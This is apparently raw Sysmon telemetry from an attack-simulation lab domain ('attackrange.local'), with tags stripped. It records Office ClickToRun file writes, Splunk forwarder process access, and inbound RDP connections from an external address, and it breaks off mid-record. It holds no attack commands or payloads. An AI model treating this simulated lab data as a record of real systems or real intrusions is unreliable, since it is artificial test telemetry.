11241100x800000000000000064005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocogl.dll2021-04-20 14:54:06.784 11241100x800000000000000064004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocpptview.dll2021-04-20 14:54:06.784 11241100x800000000000000064003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocppvwintl.dll2021-04-20 14:54:06.784 11241100x800000000000000064002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OCSAEXT.dll2021-04-20 14:54:06.784 11241100x800000000000000064001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OCSCLIENTWIN32.DLL2021-04-20 14:54:06.643 11241100x800000000000000064000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\amazonredshiftodbc_sb64.dll2021-04-20 14:54:06.597 11241100x800000000000000063999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\ssleay32.dll2021-04-20 14:54:06.597 11241100x800000000000000063998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\sbicudt53_64.dll2021-04-20 14:54:06.487 11241100x800000000000000063997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\sbicuin53_64.dll2021-04-20 14:54:06.472 11241100x800000000000000063996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\sbicuuc53_64.dll2021-04-20 14:54:06.409 11241100x800000000000000063995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.393{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\libcurl.dll2021-04-20 14:54:06.393 11241100x800000000000000063994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\libcrypto-1_1-x64.dll2021-04-20 14:54:06.378 11241100x800000000000000063993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\libssl-1_1-x64.dll2021-04-20 14:54:06.378 11241100x800000000000000063992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\libcrypto-1_1-x64.dll2021-04-20 14:54:06.362 11241100x800000000000000063991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\libssl-1_1-x64.dll2021-04-20 14:54:06.362 23542300x800000000000000063990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.206{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BCE693E53361DF9CFBCA2A3B13BAA1D,SHA256=CB09C00F191B6970891B042993407BDB40F759A63C255301960572E20F5E801C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sbicudt58_64.dll2021-04-20 14:54:06.175 11241100x800000000000000063988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.159{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sbicuin58_64.dll2021-04-20 14:54:06.159 11241100x800000000000000063987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.143{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sbicuuc58_64.dll2021-04-20 14:54:06.143 11241100x800000000000000063986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sfodbc_sb64.dll2021-04-20 14:54:06.065 11241100x800000000000000063985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBCTRAC.DLL2021-04-20 14:54:06.065 11241100x800000000000000063984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:06.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\officeappguardwin32.exe2021-04-20 14:54:06.050 11241100x800000000000000063983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFICEJS_EXCEL.DLL2021-04-20 14:54:06.050 11241100x800000000000000063982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OIMG.DLL2021-04-20 14:54:06.018 11241100x800000000000000063981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OLKFSTUB.DLL2021-04-20 14:54:06.018 11241100x800000000000000063980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMICAUT.DLL2021-04-20 14:54:06.018 10341000x800000000000000063979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.003{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB0D-607E-760B-00000000BB01}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.003{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.003{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.003{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.003{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.003{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB0D-607E-760B-00000000BB01}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.003{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB0D-607E-760B-00000000BB01}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000063972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.863{A7A01FEF-EB0D-607E-760B-00000000BB01}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000063971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnPPT.dll2021-04-20 14:54:06.003 11241100x800000000000000063970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMRAUT.DLL2021-04-20 14:54:06.003 11241100x800000000000000063969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnWD.dll2021-04-20 14:54:05.987 11241100x800000000000000063968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.987{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONECLIENTW32.DLL2021-04-20 14:54:05.987 23542300x800000000000000049458Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:06.947{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66A0F64C981FFCD3858F821A91820236,SHA256=47110550CF18B2E7723BAB29E8B919ED43879E1A2C2DAFF51DCC7CF29F846DC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049457Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:06.260{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7A5F4AB937082C0275DD993FC0EE8DF,SHA256=B2710144D2C1A1EF85FBC00025B8043CA435C7616E8714ABE63E3302F5B7EAFC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049456Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:04.313{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65110-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 11241100x800000000000000064055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Office.dll2021-04-20 14:54:07.971 11241100x800000000000000064054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\pdf2text.dll2021-04-20 14:54:07.971 11241100x800000000000000064053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ChakraCore.Debugger.dll2021-04-20 14:54:07.971 11241100x800000000000000064052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\appshcom.dll2021-04-20 14:54:07.971 11241100x800000000000000064051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:07.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\card_expiration_terms_dict.txt2021-04-20 14:54:07.971 11241100x800000000000000064050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:07.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\card_security_terms_dict.txt2021-04-20 14:54:07.971 11241100x800000000000000064049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:07.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\card_terms_dict.txt2021-04-20 14:54:07.690 354300x800000000000000064048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.747{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-19750-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.715{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-22479-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.298{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52480-false10.0.1.14win-dc-339.attackrange.local49676- 11241100x800000000000000064045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:07.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\ssn_high_group_info.txt2021-04-20 14:54:07.690 11241100x800000000000000064044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\cpprestsdk.dll2021-04-20 14:54:07.675 11241100x800000000000000064043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 